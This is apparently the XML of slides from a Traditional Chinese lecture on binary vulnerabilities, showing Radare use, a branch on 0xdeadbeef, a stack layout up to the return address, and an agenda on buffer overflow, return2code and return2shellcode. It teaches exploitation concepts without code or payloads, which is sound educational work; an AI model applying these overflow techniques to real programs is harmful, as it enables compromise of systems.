              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{090E50B0-AB90-4A38-B79C-85B037C8078E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439" y="6436665"/>
            <a:ext cx="6094520" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Radare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  逆向分析常用工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691818D2-6DF1-436C-A350-46C358C97D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3558708" y="4909351"/>
            <a:ext cx="3303731" cy="1509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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91216F91-8905-459D-A125-4F8FBE63976E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6862439" y="4984812"/>
            <a:ext cx="1873188" cy="133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243D1853-4EEB-4D34-BF69-BAA9B14AE462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8735627" y="4722920"/>
            <a:ext cx="3456373" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查看程式價購後，找到程式的重點 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>函數</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2647421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26A3E8-26E6-4609-A4F9-6AD4206BD894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>s main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>函數的組合語言</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD643AD-2157-4E5D-9170-D4B0AEB6FDF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094959" y="1890943"/>
            <a:ext cx="4532198" cy="4851648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C3B1C1-72AA-497B-A8EE-46F9B3C13E84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="2011680"/>
            <a:ext cx="2419688" cy="476316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216129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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAADA820-F5D0-49C6-AC8B-BEC944A51661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2405849" y="1571349"/>
            <a:ext cx="7380302" cy="5086904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFFE9E25-2E43-4EA2-B525-3A7A35CEE0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2929631" y="2521258"/>
            <a:ext cx="2982897" cy="22549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箭號: 向右 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3B92A2-04C3-43A7-A248-44D9DCBA99A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2175028" y="3471169"/>
            <a:ext cx="754601"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893F5440-C391-40AE-B1F8-832595D2B1F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="3320249"/>
            <a:ext cx="2175025" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這是我們想要執行的區塊</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="圖片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C04FB73-1797-4669-B6FB-84EBAE3E7111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="56010"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2405849" y="656948"/>
            <a:ext cx="7380302" cy="914401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="箭號: 向右 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09BAE927-202B-401F-BFB2-9F60D249748E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2050742" y="852125"/>
            <a:ext cx="355106"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F3B8A495-42A6-478A-A553-20F265B2BC9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2405849" y="665472"/>
            <a:ext cx="7380302" cy="7815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32E5DC9C-02FB-447B-9C90-1179F9603FFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="800729"/>
            <a:ext cx="2175025" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>當</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>var_4h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>位置資料為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0xdeadbeef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>時執行左區塊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>反之執行右區塊</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84124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165550-205E-4EA1-A3A0-65E21314AE1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34CED700-2E05-4EE4-84B8-7801A9CE0B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 動態分析  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>靜態分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞的嚴重性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PWN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(1) Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(2) Return2code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程式漏洞分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(3) return2shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132067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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD0A3F1-2030-465B-838C-F648B07BC4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5877745" cy="933580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B004130-4FC7-4393-BE6B-8CB678E0A51D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248575" y="466790"/>
            <a:ext cx="3169328" cy="21679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60EB3ADA-B7D4-4F95-9627-76F4B0B25253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1819922" y="683581"/>
            <a:ext cx="13317" cy="6569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C6C05093-6633-4951-A5AB-C23A9DBD630E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1340528"/>
            <a:ext cx="4376691" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所以為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>rbp-4byte</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2EF76A-77BD-4FA2-8D76-1A2BDA85D860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248575" y="249999"/>
            <a:ext cx="3169328" cy="2167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525380D4-3911-4BFD-842A-1FE7117A552B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3431221" y="355107"/>
            <a:ext cx="945470" cy="3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F2BBDE58-E5C7-4183-A321-53F2280661D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4376691" y="249999"/>
            <a:ext cx="4376691" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>字元陣列一字元為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1byte 20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>20byte</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="群組 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B7EFA4C-E008-45E3-BE52-EF372691DF07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7224182" y="2191925"/>
            <a:ext cx="2178658" cy="3858859"/>
            <a:chOff x="9452479" y="2149702"/>
            <a:chExt cx="2178658" cy="3858859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70EE2249-2931-471F-B1FA-1C2C0D6F880F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452480" y="5380408"/>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RETURN ADDRESS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC35F51-1DED-41C4-B103-E9B3354B22A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452480" y="4707023"/>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Saved </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
                <a:t>rbp</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F794F24B-6543-4DEC-BC68-F2AA8CA43897}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452480" y="4219517"/>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var_4h</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E9BBF4D-94CA-42AD-B195-05B3D693355C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452480" y="2637208"/>
              <a:ext cx="2178657" cy="14994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sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8BF2CB3-48F0-4B7A-8618-457725BC7DE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452479" y="2149702"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="圖片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99647913-1B5D-4842-B05B-5568BC06633F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2938872" y="4286779"/>
            <a:ext cx="3324689" cy="704948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直線單箭頭接點 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEA06833-BEB3-4CA3-9A8F-01EF30330114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307582" y="4442355"/>
            <a:ext cx="916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箭號: 上-下雙向 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E40009B-3070-48F9-AD12-9D0F4262E460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604985" y="2670013"/>
            <a:ext cx="337351" cy="13857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79B8699D-BCCF-4451-881F-FCCA62FE0DDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6013520" y="2263664"/>
            <a:ext cx="1857632" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Rbp-0x20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文字方塊 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEBBE314-DF24-4BEE-9457-4DEFD4604B46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6184405" y="4039480"/>
